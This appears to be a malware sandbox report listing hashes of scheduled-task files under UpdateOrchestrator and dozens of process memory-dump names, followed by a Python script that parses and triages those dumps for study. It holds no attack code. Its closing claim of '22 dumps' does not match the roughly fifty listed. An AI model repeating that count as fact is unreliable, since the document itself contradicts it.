                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      8495ca680bc958f7b1c5525c2e92200fc9fa1864

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      5e515b4a674e11cb67492b05a96074b3c04c8171023d75301f61322837c53346

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      8466ada9ac155f358c99f3b14a7fd27e87dd73d017930f5870b817f214c1466f8d2dae9d121ef671e5771f0ea789397d554295da6403872017311b8c40c58963

                                                                                                                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      8abf2d6067c6f3191a015f84aa9b6efe

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

                                                                                                                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      f313c5b4f95605026428425586317353

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      06be66fa06e1cffc54459c38d3d258f46669d01a

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

• C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
  Filesize: 2KB
  MD5: ceb7caa4e9c4b8d760dbf7e9e5ca44c5
  SHA1: a3879621f9493414d497ea6d70fbf17e283d5c08
  SHA256: 98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
  SHA512: 1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

• C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
  Filesize: 2KB
  MD5: 7d612892b20e70250dbd00d0cdd4f09b
  SHA1: 63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
  SHA256: 727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
  SHA512: f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

• C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
  Filesize: 2KB
  MD5: 1e8e2076314d54dd72e7ee09ff8a52ab
  SHA1: 5fd0a67671430f66237f483eef39ff599b892272
  SHA256: 55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
  SHA512: 5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

• C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
  Filesize: 2KB
  MD5: 0b990e24f1e839462c0ac35fef1d119e
  SHA1: 9e17905f8f68f9ce0a2024d57b537aa8b39c6708
  SHA256: a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
  SHA512: c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

• memory/316-592-0x00000209C6C40000-0x00000209C6C6C000-memory.dmp
  Filesize: 176KB

• memory/316-593-0x00007FF9939D0000-0x00007FF9939E0000-memory.dmp
  Filesize: 64KB

• memory/316-586-0x00000209C6C40000-0x00000209C6C6C000-memory.dmp
  Filesize: 176KB

• memory/616-559-0x00000165D95E0000-0x00000165D960C000-memory.dmp
  Filesize: 176KB

• memory/616-560-0x00007FF9939D0000-0x00007FF9939E0000-memory.dmp
  Filesize: 64KB

• memory/616-552-0x00000165D95E0000-0x00000165D960C000-memory.dmp
  Filesize: 176KB

• memory/616-551-0x00000165D95A0000-0x00000165D95C6000-memory.dmp
  Filesize: 152KB

• memory/616-553-0x00000165D95E0000-0x00000165D960C000-memory.dmp
  Filesize: 176KB

• memory/676-571-0x00007FF9939D0000-0x00007FF9939E0000-memory.dmp
  Filesize: 64KB

• memory/676-570-0x000001C58C900000-0x000001C58C92C000-memory.dmp
  Filesize: 176KB

• memory/676-564-0x000001C58C900000-0x000001C58C92C000-memory.dmp
  Filesize: 176KB

• memory/744-597-0x0000018FBBEE0000-0x0000018FBBF0C000-memory.dmp
  Filesize: 176KB

• memory/884-63-0x00007FF9B57A3000-0x00007FF9B57A5000-memory.dmp
  Filesize: 8KB

• memory/884-0-0x00007FF9B57A3000-0x00007FF9B57A5000-memory.dmp
  Filesize: 8KB

• memory/884-101-0x00007FF9B57A0000-0x00007FF9B6261000-memory.dmp
  Filesize: 10.8MB

• memory/884-2-0x00007FF9B57A0000-0x00007FF9B6261000-memory.dmp
  Filesize: 10.8MB

• memory/884-1-0x00000000002E0000-0x000000000032E000-memory.dmp
  Filesize: 312KB

• memory/960-575-0x0000017E0B7B0000-0x0000017E0B7DC000-memory.dmp
  Filesize: 176KB

• memory/960-581-0x0000017E0B7B0000-0x0000017E0B7DC000-memory.dmp
  Filesize: 176KB

• memory/960-582-0x00007FF9939D0000-0x00007FF9939E0000-memory.dmp
  Filesize: 64KB

• memory/1180-3-0x00007FF9B57A0000-0x00007FF9B6261000-memory.dmp
  Filesize: 10.8MB

• memory/1180-5-0x00007FF9B57A0000-0x00007FF9B6261000-memory.dmp
  Filesize: 10.8MB

• memory/1180-4-0x00007FF9B57A0000-0x00007FF9B6261000-memory.dmp
  Filesize: 10.8MB

• memory/1180-18-0x00007FF9B57A0000-0x00007FF9B6261000-memory.dmp
  Filesize: 10.8MB

• memory/1180-12-0x000001E96D560000-0x000001E96D582000-memory.dmp
  Filesize: 136KB

• memory/1408-535-0x00007FF9D3950000-0x00007FF9D3B45000-memory.dmp
  Filesize: 2.0MB

• memory/1408-534-0x000001EF1FC90000-0x000001EF1FCBA000-memory.dmp
  Filesize: 168KB

• memory/1408-536-0x00007FF9D2F00000-0x00007FF9D2FBE000-memory.dmp
  Filesize: 760KB

• memory/1584-538-0x0000000140000000-0x0000000140008000-memory.dmp
  Filesize: 32KB

• memory/1584-545-0x00007FF9D3950000-0x00007FF9D3B45000-memory.dmp
  Filesize: 2.0MB

• memory/1584-540-0x0000000140000000-0x0000000140008000-memory.dmp
  Filesize: 32KB

• memory/1584-548-0x0000000140000000-0x0000000140008000-memory.dmp
  Filesize: 32KB

• memory/1584-539-0x0000000140000000-0x0000000140008000-memory.dmp
  Filesize: 32KB

• memory/1584-546-0x00007FF9D2F00000-0x00007FF9D2FBE000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      760KB

                                                                                                                                                                                                                    • memory/1584-537-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      32KB

                                                                                                                                                                                                                    • memory/1584-542-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      32KB

                                                                                                                                                                                                                    • memory/1640-344-0x0000000000400000-0x0000000000420000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      128KB

                                                                                                                                                                                                                    • memory/1640-46-0x0000000000400000-0x0000000000420000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      128KB

                                                                                                                                                                                                                    • memory/2236-389-0x0000000000400000-0x0000000000420000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      128KB

                                                                                                                                                                                                                    • memory/2516-533-0x0000000000CD0000-0x0000000000CD9000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      36KB

                                                                                                                                                                                                                    • memory/2516-64-0x0000000000CD0000-0x0000000000CD9000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      36KB

                                                                                                                                                                                                                    • memory/2516-1476-0x0000000000CD0000-0x0000000000CD9000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      36KB

                                                                                                                                                                                                                    • memory/2916-82-0x0000000000870000-0x00000000008A1000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      196KB

                                                                                                                                                                                                                    • memory/4600-1374-0x000000001BAC0000-0x000000001BACE000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      56KB

                                                                                                                                                                                                                    • memory/4600-1375-0x000000001EE50000-0x000000001F378000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      5.2MB

                                                                                                                                                                                                                    • memory/4600-25-0x0000000000DA0000-0x0000000000DB8000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      96KB

                                                                                                                                                                                                                    • memory/4648-100-0x00000000005D0000-0x00000000005D9000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      36KB

                                                                                                                                                                                                                    • memory/4648-1477-0x00000000005D0000-0x00000000005D9000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      36KB

                                                                                                                                                                                                                    • memory/4648-547-0x00000000005D0000-0x00000000005D9000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      36KB

                                                                                                                                                                                                                    • memory/5056-109-0x0000000000870000-0x00000000008A1000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      196KB
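The memory-dump listing above encodes the process id, a sequence number and the dumped address range in each file name, and the same region is often dumped several times (for example the 32KB region at 0x140000000 in PID 1584). The script below is an added triage helper, not part of the sandbox report or its tooling: it parses that naming convention (assumed from the listing to be memory/<pid>-<seq>-<start>-<end>-memory.dmp), checks that the stated file size agrees with the address range, collapses repeated dumps of one region, and tags regions by start address using heuristics that are the author's assumptions (0x140000000 is the MSVC default image base for 64-bit EXEs, 0x400000 for 32-bit EXEs, and addresses at or above 0x7FF000000000 are where ASLR'd system DLLs normally sit on 64-bit Windows 10). The sample listing is constructed from a subset of the entries on this page.

```python
import re
from collections import Counter
from typing import NamedTuple

# Constructed sample: a subset of the memory-dump entries listed on this page,
# written as "<dump name> <stated size>", one per line.
SAMPLE_LISTING = """\
memory/1584-537-0x0000000140000000-0x0000000140008000-memory.dmp 32KB
memory/1584-538-0x0000000140000000-0x0000000140008000-memory.dmp 32KB
memory/1584-539-0x0000000140000000-0x0000000140008000-memory.dmp 32KB
memory/1584-545-0x00007FF9D3950000-0x00007FF9D3B45000-memory.dmp 2.0MB
memory/1584-546-0x00007FF9D2F00000-0x00007FF9D2FBE000-memory.dmp 760KB
memory/1640-46-0x0000000000400000-0x0000000000420000-memory.dmp 128KB
memory/1640-344-0x0000000000400000-0x0000000000420000-memory.dmp 128KB
memory/2516-533-0x0000000000CD0000-0x0000000000CD9000-memory.dmp 36KB
memory/4600-1375-0x000000001EE50000-0x000000001F378000-memory.dmp 5.2MB
memory/5056-109-0x0000000000870000-0x00000000008A1000-memory.dmp 196KB
"""

# Assumed naming convention, inferred from the listing:
#   memory/<pid>-<seq>-0x<start>-0x<end>-memory.dmp
DUMP_RE = re.compile(
    r"memory/(?P<pid>\d+)-(?P<seq>\d+)-0x(?P<start>[0-9A-Fa-f]+)-0x(?P<end>[0-9A-Fa-f]+)"
    r"-memory\.dmp\s+(?P<stated>\S+)"
)


class Dump(NamedTuple):
    pid: int
    seq: int
    start: int
    end: int
    stated: str  # size string as printed by the sandbox, e.g. "32KB"


def parse_listing(text: str) -> list[Dump]:
    """Turn the raw listing into Dump records, skipping lines that do not match."""
    dumps = []
    for line in text.splitlines():
        m = DUMP_RE.search(line)
        if not m:
            continue
        dumps.append(Dump(int(m["pid"]), int(m["seq"]),
                          int(m["start"], 16), int(m["end"], 16), m["stated"]))
    return dumps


def human_size(n: int) -> str:
    """Format bytes the way the report does: whole KB below 1 MiB, one decimal MB above."""
    if n >= 1 << 20:
        return f"{n / (1 << 20):.1f}MB"
    return f"{n // 1024}KB"


def region_size(d: Dump) -> int:
    return d.end - d.start


def size_matches(d: Dump) -> bool:
    """True when the range implied by the file name agrees with the stated file size."""
    return human_size(region_size(d)) == d.stated


# Heuristic tags by start address (assumptions by the author, not sandbox metadata).
X64_DEFAULT_IMAGE_BASE = 0x140000000   # MSVC linker default for 64-bit EXEs
X86_DEFAULT_IMAGE_BASE = 0x400000      # default image base for 32-bit EXEs
HIGH_USER_RANGE = 0x7FF000000000       # typical ASLR'd system-DLL range on x64 Windows 10


def classify(d: Dump) -> str:
    if d.start == X64_DEFAULT_IMAGE_BASE:
        return "x64-image-base"      # likely an unpacked / in-memory PE of the process itself
    if d.start == X86_DEFAULT_IMAGE_BASE:
        return "x86-image-base"
    if d.start >= HIGH_USER_RANGE:
        return "high-user-range"     # usually a mapped system DLL, lower priority
    return "dynamic"                 # heap, JIT or injected allocation: worth a closer look


def unique_regions(dumps: list[Dump]) -> Counter:
    """Collapse repeated dumps of the same region into (pid, start, end) -> dump count."""
    return Counter((d.pid, d.start, d.end) for d in dumps)


def triage(text: str) -> list[dict]:
    """One row per distinct region: size, how often it was dumped, tag and size check."""
    dumps = parse_listing(text)
    rows = []
    for (pid, start, end), n in sorted(unique_regions(dumps).items()):
        d = next(x for x in dumps if (x.pid, x.start, x.end) == (pid, start, end))
        rows.append({"pid": pid, "start": start, "end": end, "dumps": n,
                     "size": human_size(end - start), "class": classify(d),
                     "size_ok": size_matches(d)})
    return rows


if __name__ == "__main__":
    for r in triage(SAMPLE_LISTING):
        print(f"pid {r['pid']:>5}  0x{r['start']:016X}-0x{r['end']:016X}  {r['size']:>6}  "
              f"x{r['dumps']}  {r['class']:<15}  {'ok' if r['size_ok'] else 'MISMATCH'}")
```

Run against the full listing, the size check passes for every entry on this page, so the file names can be trusted as region boundaries; the distinct-region view then shrinks the 22 dumps to a handful of candidates, with the image-base and dynamic regions being the ones to load into a disassembler first.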